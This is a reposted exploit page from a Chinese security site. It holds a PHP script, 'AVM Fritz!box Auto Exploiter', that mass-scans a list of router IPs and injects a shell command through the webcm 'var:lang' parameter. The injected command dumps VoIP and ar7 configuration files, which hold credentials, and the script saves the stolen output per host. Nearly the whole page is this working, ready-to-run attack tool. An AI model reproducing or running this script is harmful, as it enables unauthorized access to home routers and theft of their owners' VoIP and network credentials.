首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
AVM Fritz!box Auto Exploiter
来源:vfocus.net 作者:vfocus 发布时间:2015-01-08  
<?php
echo "

              +++++++++++++++++++++++++++++++++++++++++++++++
              ++              Fritz!Box Fucker             ++
              ++                     By                    ++
              ++                BaD-HaCKeR-MaN             ++
              +++++++++++++++++++++++++++++++++++++++++++++++
              
              
";

set_time_limit(0);
error_reporting(0);


function func1($url){
$curl=curl_init();
    
    curl_setopt($curl, CURLOPT_RETURNTRANSFER,1);
    curl_setopt($curl, CURLOPT_URL,$url."/cgi-bin/webcm?getpage=../html/menus/menu2.html&var:lang=%26 allcfgconv -C voip -c -o - ../../../../../var/tmp/voip.cfg %26");
    curl_setopt($curl, CURLOPT_COOKIEFILE, '/'); 
    curl_setopt($curl, CURLOPT_COOKIEJAR, '/'); 
    curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
    curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 0);
    curl_setopt($curl, CURLOPT_FOLLOWLOCATION,0);
    curl_setopt($curl, CURLOPT_TIMEOUT,15);
    curl_setopt($curl, CURLOPT_HEADER, true); 
    $exec=curl_exec($curl);
    curl_close($curl);
return $exec;
}

function func2($url){
$curl=curl_init();

    curl_setopt($curl, CURLOPT_RETURNTRANSFER,1);
    curl_setopt($curl, CURLOPT_URL,$url."/cgi-bin/webcm?getpage=../html/menus/menu2.html&var:lang=%26 allcfgconv -C voip -c -o - ../../../../../var/tmp/voip.cfg %26");
    curl_setopt($curl, CURLOPT_COOKIEFILE, '/'); 
    curl_setopt($curl, CURLOPT_COOKIEJAR, '/'); 
    curl_setopt($curl, CURLOPT_FOLLOWLOCATION,0);
    curl_setopt($curl, CURLOPT_TIMEOUT,15);
    curl_setopt($curl, CURLOPT_HEADER, true); 
    $exec=curl_exec($curl);
    curl_close($curl);
return $exec;
}

function func3($url){
$curl=curl_init();

    curl_setopt($curl, CURLOPT_RETURNTRANSFER,1);
    curl_setopt($curl, CURLOPT_URL,$url."/cgi-bin/webcm?getpage=../html/menus/menu2.html&var:lang=%26%20allcfgconv%20-C%20ar7%20-c%20-o%20-%20../../../../../var/flash/ar7.cfg%26");
    curl_setopt($curl, CURLOPT_COOKIEFILE, '/'); 
    curl_setopt($curl, CURLOPT_COOKIEJAR, '/'); 
    curl_setopt($curl, CURLOPT_FOLLOWLOCATION,0);
    curl_setopt($curl, CURLOPT_TIMEOUT,15);
    curl_setopt($curl, CURLOPT_HEADER, true); 
    $exec=curl_exec($curl);
    curl_close($curl);
return $exec;
}

function func4($url){
$curl=curl_init();
    
    curl_setopt($curl, CURLOPT_RETURNTRANSFER,1);
    curl_setopt($curl, CURLOPT_URL,$url."/cgi-bin/webcm?getpage=../html/menus/menu2.html&var:lang=%26%20allcfgconv%20-C%20ar7%20-c%20-o%20-%20../../../../../var/flash/ar7.cfg%26");
    curl_setopt($curl, CURLOPT_COOKIEFILE, '/'); 
    curl_setopt($curl, CURLOPT_COOKIEJAR, '/'); 
    curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
    curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 0);
    curl_setopt($curl, CURLOPT_FOLLOWLOCATION,0);
    curl_setopt($curl, CURLOPT_TIMEOUT,15);
    curl_setopt($curl, CURLOPT_HEADER, true); 
    $exec=curl_exec($curl);
    curl_close($curl);
return $exec;
}



$FritzBoxIps = file("ips.txt");

foreach($FritzBoxIps as $FritzBoxD){
/*
        preg_match_all("/\|\s[0-9].*:/" , $FritzBoxD , $FritzBox);
        $FritzBox = $FritzBox[0][0];
        $FritzBox = str_replace("| " , "" , $FritzBox);
        $FritzBox = str_replace(":" , "" , $FritzBox);
 */

    if(preg_match("/\|\s/" , $FritzBoxD)){
        
        preg_match_all("/\|\s.*\:/" , $FritzBoxD , $a);
        
        $FritzBox = str_replace( "| " , "" , str_replace(":" , "" , $a[0][0]));
        
    }else{
        
        preg_match_all("/[0-9].*\.[0-9].*\.[0-9].*\.[0-9]*/" , $FritzBoxD , $a);
        $FritzBox = $a[0][0];
        
    }
	
        echo "[+] Testing $FritzBox \n";
        
        $FritzHTTP = func2("http://$FritzBox");
        if(eregi("voipcfg" , $FritzHTTP)){
            echo "     + Success Exploit In http://$FritzBox/ \n";
            $ar7 = func3("http://$FritzBox");
            $fp = fopen($FritzBox.".txt", 'a+');
            fwrite($fp, "http://$FritzBox \n\n $FritzHTTP \n\n $ar7 ");
            fclose($fp);
        }
        
        $FritzHTTPS = func1("https://$FritzBox");
        if(eregi("\x76\x6f\x69\x70\x63\x66\x67" , $FritzHTTPS)){
            echo "     + Success Exploit In https://$FritzBox/ \n";
            $ar7 = func4("https://$FritzBox");
            $fp = fopen($FritzBox.".txt", 'a+');
            fwrite($fp, "\n\n https://$FritzBox \n\n $FritzHTTPS \n\n $ar7 ");
            fclose($fp);
        }
        
        if(!eregi("voipcfg" , $FritzHTTP) and !eregi("\x76\x6f\x69\x70\x63\x66\x67" , $FritzHTTPS)){
            $fp = fopen("Not-Opened.txt", 'a+');
            fwrite($fp, "$FritzBox \n");
            fclose($fp);
        }
}
?>

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Pandora 3.1 Auth Bypass / Arbi
·Ntpdc 4.2.6p3 - Local Buffer O
·Microsoft Dynamics CRM 2013 SP
·OS X 10.9.x - sysmond XPC Priv
·McAfee ePolicy Orchestrator Au
·RedStar 3.0 Desktop - Privileg
·BulletProof FTP Client BPS Buf
·RedStar 3.0 Desktop - Privileg
·ManageEngine Desktop Central A
·RedStar 2.0 Desktop - Privileg
·AdaptCMS 3.0.3 XSS / Remote Co
·WordPress WP Symposium 14.11 S
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved